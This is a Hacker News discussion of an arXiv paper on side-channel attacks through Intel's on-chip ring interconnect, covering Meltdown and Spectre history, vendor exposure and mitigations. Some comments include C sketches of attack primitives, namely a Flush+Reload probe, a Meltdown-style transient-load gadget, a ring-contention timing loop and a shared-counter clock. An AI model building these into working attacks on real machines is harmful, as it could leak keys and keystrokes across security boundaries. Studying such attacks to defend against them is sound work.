Lord of the Ring(s): Side Channel Attacks on the CPU On-Chip Ring Interconnect (arxiv.org)
188 points by nixgeek 37 days ago | 55 comments



>Finally, AMD CPUs utilize other proprietary technologies known as Infinity Fabric/Architecture for their on-chip interconnect. Investigating the feasibility of our attack on these platforms requires future work. However, the techniques we use to build our contention model can be applied on these platforms too.

I notice often that when coverage of these side channels starts spreading, Intel takes a hit and AMD thrives. While the majority of these side-channel attacks are tuned to Intel chips, the theory behind them, along with a decent amount of work, can often make them applicable to AMD as well, and in some cases even to other architectures (ARM, MIPS, SPARC, etc.).


Yep. I wish I could remember the details, but in one of the episodes of the On The Metal podcast they talked to someone who backported Meltdown/Spectre to a bunch of CPUs that are decades old or really exotic.

I don't know why, but there's something really surprising to me about how far-reaching the issues are when you pull them back to first principles.


A big difference between the impact on Intel and AMD comes down to only part of the recent attacks being a genuinely new class of attack opening new ground - namely the generic speculative execution part.

A big part of what turned it into an "Intel fail" was various errors on Intel's part, like moving verification of memory accesses to instruction retirement and similar things that even to an uneducated person like me look like "tricks to make single-core performance shine".


Not sure if the checks of all loads are done at instruction retirement, but yes they are done after the (speculative) execution of the load.

We can also talk about the Store-to-Load Forwarding involving a partially checked physical address, exploited by the Fallout attack, an optimization Intel patented back in 2006 [1]. All these Intel optimizations are old, sometimes patented (which reduces the chance that IBM, ARM or AMD will do the same), and totally valid and safe as long as it's assumed that data used during speculative execution cannot be recovered.

The recovery of this data became possible only when the Flush+Reload side channel was discovered in 2014 [2] (which originally didn't target speculative execution). It was only 3 years later that the Meltdown attack used Flush+Reload as a covert channel to exfiltrate data during speculative execution.
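To make the primitive concrete, here is a minimal sketch of a Flush+Reload probe on x86 (not the code from [2]; `target` is assumed to point into memory shared with the victim, such as a mapped shared library, and THRESHOLD_CYCLES is an assumed, machine-specific calibration value):

    /* Minimal Flush+Reload probe sketch (x86, GCC/Clang intrinsics).
       Assumptions: `target` points into memory shared with the victim,
       THRESHOLD_CYCLES has been calibrated for this machine. */
    #include <stdint.h>
    #include <x86intrin.h>

    #define THRESHOLD_CYCLES 100   /* assumption: calibrate per machine */

    static inline int probe(const volatile uint8_t *target)
    {
        unsigned int aux;
        uint64_t start, end;

        _mm_mfence();
        start = __rdtscp(&aux);            /* timestamp before the reload */
        (void)*target;                     /* reload the cache line       */
        end = __rdtscp(&aux);
        _mm_mfence();

        _mm_clflush((const void *)target); /* flush again for the next round */

        /* A fast reload means the line was cached, i.e. someone touched it
           since the last flush. */
        return (end - start) < THRESHOLD_CYCLES;
    }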

It seems to me that this timeline shows that it was not possible in 2006 to anticipate this issue. So it's not just a lack of education.

Perhaps a lack of security research at Intel to continuously challenge their optimizations?

But please note that there is no theory to simply determine whether these optimizations are a good idea or not. Criticism is easier afterwards when you know how the attacks are produced. But in 2017 this type of attack was something new.

That said, some of Intel's responses to the flaws (partial correction of vulnerabilities, lack of dialogue with researchers, etc.) are very worrying and I think these criticisms are much more legitimate.

[1] : https://patents.google.com/patent/US20080082765A1

[2] : https://eprint.iacr.org/2013/448.pdf


Thanks for the in-depth explanation!

I will admit that I'm not an expert in microarchitecture design, so to me the expected flaw would be "we do something wrong in speculative execution and end up bypassing the checks in a destructive way", not through side channels. I didn't know about the patents involved. And of course timing attacks make everything worse for all of us :/


Those weren't Intel fails. No CPU manufacturer had any kind of generic rule against that sort of microarchitectural optimisation, and it's hard to imagine a rule that would have blocked such optimisations by policy without also ruling out all speculative execution. The only reason AMD wasn't hit by Meltdown too is that their cores are/were less optimised.


Moving memory access verification to instruction retirement is the kind of risky optimization one should be wary of immediately, even if Spectre and the like weren't yet known, if only because the consequences of getting it wrong are that much higher.


Ok, but "Intel fail" indicates Meltdown was specific to Intel processors, when it was also present on IBM and some Arm designs.


I specifically separated the "new class of microarchitecture timing attacks", which was common across many systems (including AMD, POWER and ARM), from the "Intel fail", where overly aggressive optimization tricks did turn out to be a bad idea.


What specific optimization are you referring to? The one you mentioned, moving access auth checks to retirement, was something both ARM and POWER did.


Neither ARM nor POWER did that - they had a timing side channel from speculative execution (i.e. whether a branch was taken or not).

What Intel did was defer all memory access auth checks to retirement, so appropriately crafted code could bypass the protection bits in the TLB, not just snoop elements of the cache (AMD, ARM, POWER).
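Roughly, the gadget looks like this (a hedged sketch, not any particular PoC: `kernel_addr` is a placeholder supervisor-only address, the fault is swallowed with a SIGSEGV handler, and on mitigated or unaffected CPUs nothing leaks):

    /* Sketch of the Meltdown-style gadget: on affected CPUs the value of the
       faulting load is transiently forwarded to the dependent load, leaving a
       cache footprint in probe_array before the fault is delivered. */
    #include <setjmp.h>
    #include <signal.h>
    #include <stdint.h>

    static volatile uint8_t probe_array[256 * 4096];
    static sigjmp_buf recover;

    static void segv_handler(int sig)
    {
        (void)sig;
        siglongjmp(recover, 1);
    }

    static void transient_access(const volatile uint8_t *kernel_addr)
    {
        signal(SIGSEGV, segv_handler);

        if (sigsetjmp(recover, 1) == 0) {
            /* Architecturally this load faults (supervisor-only page), but if
               permission checks are only enforced at retirement, `secret` can
               briefly feed the next load. */
            uint8_t secret = *kernel_addr;
            (void)probe_array[secret * 4096];
        }
        /* Afterwards, Flush+Reload each probe_array[i * 4096] to see which of
           the 256 pages became cached; on mitigated/unaffected CPUs, none do. */
    }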


Yes, they did.

Intel's implementation of checking permissions in parallel with speculative loads was vulnerable because the transient effects could be observed through cache timing information.

All of these attacks, meltdown included, use "timing side channels from speculative execution."

POWER9 had the same problem (and therefore was similarly vulnerable to meltdown) for memory accesses that hit in the L1. i.e. userspace accesses to kernel addresses cached in the L1 could produce observable data-dependent effects because the data was available for further speculative execution before the permission exception was raised. This is why the Linux kernel put in place a mitigation for meltdown on POWER CPUs that involves flushing the L1-D cache on transitions to/from kernel space ("RFI flush").

To be clear, the vulnerability that Intel processors have because they "move memory access verification to instruction retirement" is called "meltdown." When I said that meltdown was present on IBM and some Arm designs, I meant that these designs are vulnerable to the same exploit because they have comparable problems with regard to memory permission checks. I was not referring to the various other spectre-type vulnerabilities, which are even more widespread.

So to summarize:

Ok, but "Intel fail" indicates Meltdown was specific to Intel processors, when it was also present on IBM and some Arm designs.


"Too aggressive" is just, like, your opinion, man. There are tons of workloads where only maximum throughput or lowest latency are important and the operators of those systems don't care one jot about side channel attacks.


And PC / general-purpose CPUs aren't such a workload.


They aren't?

I know a significant number of people who have disabled spectre and meltdown protections in favor of higher performance because they are not concerned at all about side channel attacks.

Single tenant workloads that run no untrusted code that are not public facing are not exactly a unicorn.


> The only reason AMD wasn't hit by Meltdown too is their cores are/were less optimised.

That doesn't answer whether they were less optimized because someone on the Red team realized that was a good idea.


There's clearly no such red team, as otherwise they would have blocked various Spectre attacks too, being as they are all variants of the same problem. AMD were taken by surprise like every other vendor, they just got "lucky" with Meltdown.


That was Jon Masters, who led the technical Spectre/Meltdown response for Red Hat; he was talking about porting it to SPARC and Itanium, and maybe others as well.

https://oxide.computer/podcast/on-the-metal-8-jon-masters/


Intel CPUs are more widely deployed, especially on the types of systems under more attack. That's why attacks are designed for them.


Considering the shift from Intel to AMD over the last couple of years, it will be interesting to see whether AMD becomes more of a priority target in the future. AMD has certainly been leading in sales in most segments for the last year or two, and there's little sign of Intel closing that gap. AMD has even made some moves recently that indicate a desire to chase Intel out of the lead in the few niches it still controls, like the x86 low-power/low-cost device market that has been dominated by Atom/Celeron.


Turns out exploiting these issues seems to be easier on Intel. Perhaps since it's so dominant, Intel is where the majority of the research is focused. But perhaps, the huge architectural differences which made Intel more vulnerable to more Spectre variants are responsible. It's clear Intel has been taking many shortcuts with its CPU design in favor of speed and has been for decades.


Because AMD has a tiny market share. Trust me, if AMD were on top, it would be riddled with holes, just like Intel.


https://www.techspot.com/news/87436-amd-chipping-away-intel-...

After checking a few sites, it looks like AMD may have between 20% and 37% of the PC market. I do not consider that "tiny."


In the server market Intel had 92.9% for Q4 2020. AMD is actually up a lot in that market (Intel had 95.5% in 2019), but outside of a few specific use cases Intel still owns the segment most likely to contain interesting information an attacker might want.

This attack as it stands does not seem to apply to Intel server hardware from Skylake to the present due to a different interconnect architecture, though the researchers believe the attack may be portable there, if also more limited.

Complete rectal estimation here, but I'd imagine executive laptops are probably the next juiciest target, as the end-user machines most likely to contain "interesting" data. While AMD has been making incredible inroads in the laptop market with Zen 2 and especially Zen 3 (as opposed to the Bulldozer era, when seeing an AMD sticker on a laptop let you know it was the cheapest one on the shelf), they still haven't made it into the models commonly bought by businesses.

AMD is absolutely killing it in the DIY desktop space, deservedly so (this post typed from a 3900X that I love), but on the OEM side of things you still generally have to go out of your way to find them in anything not marketed at gamers.


It's true. I've read one side channel attack paper that admitted towards the end that the researchers didn't actually even have access to AMD hardware to test with, but thought it should work in principle.

Fact is, Intel takes the brunt of these attacks because their HW is more available, especially in semi-standardised environments like universities. Also, Intel funds researchers (this paper was partly funded by Intel), and their technical documentation is better than AMD's, at least in my experience. That makes it easier to understand the CPU internals, which is a big part of these papers.


This is a great paper, really well explained. The source code: https://github.com/FPSG-UIUC/lotr

The TL;DR is that the L3 cache (LLC: Last Level Cache) is shared between all cores on the chip, but the L3 is composed of a number of slices colocated with each core: the L3 is actually CC-NUMA! There is contention when reading/writing to the L3 via the ring interconnect, which can be used to infer the memory access patterns of other cores. There's a bit more covering how the L1/L2 caches, private to each core, are revealed via the set inclusivity property of Intel's cache design.
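As a rough illustration of the measurement primitive (not the authors' code; see the repo above for the real thing), the receiver just times batches of loads that have to cross the ring and watches for latency spikes:

    /* Rough sketch of the receiver side: time batches of loads that miss the
       private L1/L2 and are served by a remote LLC slice over the ring.
       Assumptions: `buf`, `stride` and `nlines` describe an eviction set that
       reliably misses L1/L2 and hits the chosen LLC slice. Spikes in
       latencies[] correlate with other agents using the same ring segment. */
    #include <stddef.h>
    #include <stdint.h>
    #include <x86intrin.h>

    void monitor_ring(const volatile uint8_t *buf, size_t stride, size_t nlines,
                      uint32_t *latencies, size_t nsamples)
    {
        unsigned int aux;
        for (size_t s = 0; s < nsamples; s++) {
            uint64_t t0 = __rdtscp(&aux);
            for (size_t i = 0; i < nlines; i++)
                (void)buf[i * stride];      /* each load travels over the ring */
            uint64_t t1 = __rdtscp(&aux);
            latencies[s] = (uint32_t)(t1 - t0);
        }
    }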

In monitoring the LLC it is similar to https://eprint.iacr.org/2015/898.pdf, though it doesn't reference that work.

It isn't a game-over attack, but it reinforces how sharing resources (cache, memory, cores) is a bad idea when that sharing crosses a security boundary. VM-exclusive cache regions (Intel CAT cache partitioning) and cache locking should help, but cache slice partitioning is required too.


We should just stop running multiple programs on the same hardware.


Alternatively: maybe eliminating observable side effects from cache behavior by restricting accurate timing information to privileged processes is the way to go. Though I imagine that's a lot easier done at the level of, say, a JavaScript interpreter than at the level of raw machine code. There are probably a lot of indirect ways of figuring out how long something took when you can run arbitrary instructions and/or you're allowed to run multiple threads that share memory. Even being able to launch two threads and find out which one finished first can be used to construct a crude stopwatch.


Yea, that's a good way to go in the medium term. I like the Mill design, where every fetch from memory can return NaR (Not a Result, which is a little like a floating-point NaN), and all operations on a NaR take the same amount of time as normal but pass the NaR through. Also, they made sure to put the memory protection _before_ the cache, so when you don't have access to the memory you get the NaR before it even consults the cache. Looks like there are some nice performance benefits too.

In the long term though? Who knows. Separate cpu+cache+memory hardware for every process seems a little crazy, but the alternatives might be worse.


> or you're allowed to run multiple threads that share memory.

Indeed, you can always spawn a helper thread that does nothing but increment a counter in shared memory and use that as a clock substitute. That's why browsers disabled SharedArrayBuffer after Spectre was revealed.
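A minimal native sketch of that counter-thread clock, using pthreads and a relaxed atomic (the names here are mine, not from any particular exploit):

    /* Minimal counter-thread "clock": one thread spins incrementing a shared
       counter; other threads read it as a timestamp substitute. This is the
       native analogue of the SharedArrayBuffer trick browsers disabled. */
    #include <pthread.h>
    #include <stdatomic.h>
    #include <stdint.h>

    static atomic_uint_fast64_t ticks;

    static void *clock_thread(void *arg)
    {
        (void)arg;
        for (;;)
            atomic_fetch_add_explicit(&ticks, 1, memory_order_relaxed);
        return NULL;
    }

    /* Read the "time"; resolution is a few CPU cycles per tick, depending on
       how fast the spinning core increments. */
    static uint64_t now(void)
    {
        return (uint64_t)atomic_load_explicit(&ticks, memory_order_relaxed);
    }

    /* Usage sketch:
         pthread_t t;
         pthread_create(&t, NULL, clock_thread, NULL);
         uint64_t t0 = now();  ... operation to time ...  uint64_t t1 = now(); */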

So this isn't practical for any programs that need fine-grained parallelism.


And for additional security, reduce the program count by one beyond that.


Perhaps we should stop running multiple programs on the same hardware at the same time while making sure information isn't leaked between domains?

If the future provides us with large but thermally limited dies, I could see a scenario where CPU components are duplicated but not all running at once. A thread or set of threads could own a hierarchy of caches, for example. Caches are die-intensive, so I don't see this happening soon, but maybe at some point in the future.


It seems like it might be totally feasible to make a CPU where one core runs all the Ring 0 stuff, and the rest don't.


You don't really need a CPU to do that. Just operating system decisions.

a) route all hardware interrupts to CPU 0 only

b) when a user thread does a syscall, immediately task switch to another thread, marking the current thread as entering/in the kernel. Only service threads entering/in the kernel on CPU 0.

Technically, you need a little bit of ring 0 time to task switch. But if you make all of the syscalls amazingly slow, timing attacks are a lot harder.
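For (a), Linux already exposes per-IRQ affinity masks, so a rough sketch (assuming root, and that the IRQ isn't one the kernel refuses to move) is just a loop over /proc/irq:

    /* Rough sketch of (a): steer every steerable IRQ to CPU 0 by writing the
       affinity mask "1" to /proc/irq/<n>/smp_affinity. Assumes Linux and root;
       writes to IRQs the kernel won't move simply fail and are skipped. */
    #include <ctype.h>
    #include <dirent.h>
    #include <stdio.h>

    int main(void)
    {
        DIR *d = opendir("/proc/irq");
        struct dirent *e;
        if (!d)
            return 1;
        while ((e = readdir(d)) != NULL) {
            if (!isdigit((unsigned char)e->d_name[0]))
                continue;              /* skip ".", "..", default_smp_affinity */
            char path[288];
            snprintf(path, sizeof path, "/proc/irq/%s/smp_affinity", e->d_name);
            FILE *f = fopen(path, "w");
            if (!f)
                continue;
            fputs("1\n", f);           /* CPU bitmask: CPU 0 only */
            fclose(f);
        }
        closedir(d);
        return 0;
    }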


There are some patches out there that allow you to lock kernel threads to particular cores.

With all the cache flushes on context switch, making syscalls slow should be no problem at all.


My memory could very well be wrong here, but isn't this how multi-core was first implemented on FreeBSD, with all post-context-switch kernel code running on CPU0? It's certainly a much simpler design, easier to avoid data races and deadlocks. However, I believe the performance penalties were pretty apparent early on, even on 2-4 core systems.


I wasn't that well versed in kernel stuff back then, and I don't recall seeing anything about the kernel always running on CPU0; but I think everything was behind the GIANT lock, so there was effectively zero kernel concurrency.


I like that idea!

There's already a large slowdown because of communication and NUMA. The syscall arguments have to be transferred to CPU 0 memory as well.


I just skimmed a little bit of the paper so I'm probably missing a lot of context, but would restricting to one core even help in this instance? Information is leaking via the L3 cache, which is shared.


Original iOS and iPads were right - you should only be able to see a single piece of software and everything else should stop. This will make you safe and secure.


> VM exclusive cache regions and cache locking should help, but cache slice partitioning is reqd too.

Note that in this instance the shared resource is the bus used to access the cache. Reserving a cache region won't help with that. One would have to reserve time slices on the bus.


But if the cache is in a different set, and each security partition has exclusive access to particular slices, you can't get contention because access is forbidden.

Also, time slicing might not be sufficient due to the queues in each LLC slice. If you can fill the queue the bus access will retry I guess.


Note that the implementation of EdDSA that the authors investigated (libgcrypt) is not a constant-time implementation. Better implementations are more likely to be safe.

See: https://news.ycombinator.com/item?id=21352821
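To make "constant-time" concrete, here is a toy contrast (not libgcrypt's actual code; 64-bit toy arithmetic, overflow ignored) between a square-and-multiply loop with a secret-dependent branch and a branchless variant:

    /* Toy illustration only. In the leaky version, whether the multiply runs
       depends on each secret exponent bit, so its timing and cache footprint
       encode the key; the branchless version executes the same instruction
       stream regardless of the key bits. */
    #include <stdint.h>

    uint64_t modexp_leaky(uint64_t base, uint64_t exp, uint64_t mod)
    {
        uint64_t r = 1;
        base %= mod;
        while (exp) {
            if (exp & 1)                    /* secret-dependent branch */
                r = (r * base) % mod;
            base = (base * base) % mod;
            exp >>= 1;
        }
        return r;
    }

    uint64_t modexp_ct(uint64_t base, uint64_t exp, uint64_t mod)
    {
        uint64_t r = 1;
        base %= mod;
        for (int i = 0; i < 64; i++) {
            uint64_t bit  = (exp >> i) & 1;
            uint64_t mask = 0 - bit;        /* all-ones when the bit is set */
            uint64_t mul  = (r * base) % mod;
            r = (mul & mask) | (r & ~mask); /* select without branching */
            base = (base * base) % mod;
        }
        return r;
    }

(Real implementations also need constant-time bignum arithmetic and usually blinding; this only illustrates the class of leak.)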


I've read a lot of side channel papers like this one over the past few years. Here are some thoughts.

Firstly, this new technique is probably not exploitable against 'real' cryptographic software. A very common move in these papers is to attack obsolete versions of libgcrypt, because old versions of this relatively obscure crypto library don't use constant-time code. All modern, patched crypto implementations that people actually use would not leak via this technique, as the paper admits at the end. And even libgcrypt was patched years ago. The version number cited in these papers never makes this clear - you have to look up the release history to realise it.

Secondly, this paper is a bit unusual in the sheer number of steps that are simulated or otherwise simplified, e.g. by requiring root. It has some work to do before it's usable outside of lab-condition demonstrations.

OK, so the crypto attack is theoretical and wouldn't work in real life, but what about the ability to extract passwords from typing patterns? Well, if we read that part of the paper carefully we can see a rather massive caveat: all it takes is 2 threads doing stuff in the background and the signal is drowned in noise; 4 threads doing stuff cause the signal to be lost entirely. So there seems to be a simple mitigation, and it's unclear whether this would work at all on a server under even moderate load.

Moreover, whilst a casual reader may get the impression they can extract passwords, they don't actually demonstrate that. Rather, they demonstrate what they claim is "a very distinguishable pattern" in ring contention triggered by keystrokes, with "zero false positives and zero false negatives". That sounds impressive, but no information is given on what they're comparing against: what were the other events being tested here? The obvious question in my mind is how much of the signal they're seeing comes from the actual keystroke vs the output being printed to a terminal emulator, in which case I'd expect potential false positives from any printing to the terminal. Their victim program doesn't merely monitor keystrokes; the keystrokes are also echoed to the terminal, which is not what happens during password input, where characters aren't visible. As a consequence, this mock victim program is not much like a real password input program.

Overall it's a clever paper, but I find myself increasingly fatigued by this genre of research. They seem to have settled into a template:

• Attack Intel, ignore everything else.

• Make grand and scary-sounding claims.

• Only demonstrate them against deliberately crippled victim programs in very artificial conditions.

It's been a few years now and I don't think any Spectre attack has ever been spotted in the wild, mounted by real attackers. That's true despite a huge state-sponsored attack having just been detected, one that Microsoft claims might have had over 1,000 developers working on it. Uarch side-channel attacks sound cool, but it seems real attackers either can't make them work or have easier ways to get what they want. I find myself losing interest as a consequence.


I am an author of the paper. Great question on the signal of the actual keystroke vs output being printed to a terminal. We did test that, and the attack works perfectly also without ECHOing characters in the terminal emulator (i.e., printing to the terminal is not a requirement).


I agree with most of what you said, but as for a Spectre attack never having been spotted in the wild, that seems to no longer be true.

Just a few days ago there were some news about the discovery of the first real malware that had exploited a Spectre variant.

Unfortunately I do not remember where I saw this, but it was said that the Spectre-based malware might have spread for a few months before being identified recently.


Are you perhaps thinking of the CANVAS exploit kit that was leaked from Immunity?

If so, I agree this is a good example, although how 'in the wild' a red team exploit kit can be considered to be is perhaps up for debate.


>It's been a few years now and I don't think any Spectre attack has ever been spotted in the wild

https://dustri.org/b/spectre-exploits-in-the-wild.html

However, I agree on your points. I just hope it makes Intel's share price dip so I can make more money.


Well, not really. See my comment here:

https://news.ycombinator.com/item?id=26306733


Could you explain why "attribution is trivial"?


I, for one, am mostly preoccupied with the covert channel. That one sounds like it's pretty real.


Systems are full of covert channels; can you explain why they would be a security problem to you?


Why do authors use such silly titles as "Lord of the Rings"? There is no mention of it anywhere in the paper besides the title; it just looks childish (to me). Just use the second part of the title as the paper's title and dump the LoTR thing.


Strong disagree, it's more memorable.


Can it be used to circumvent IME?



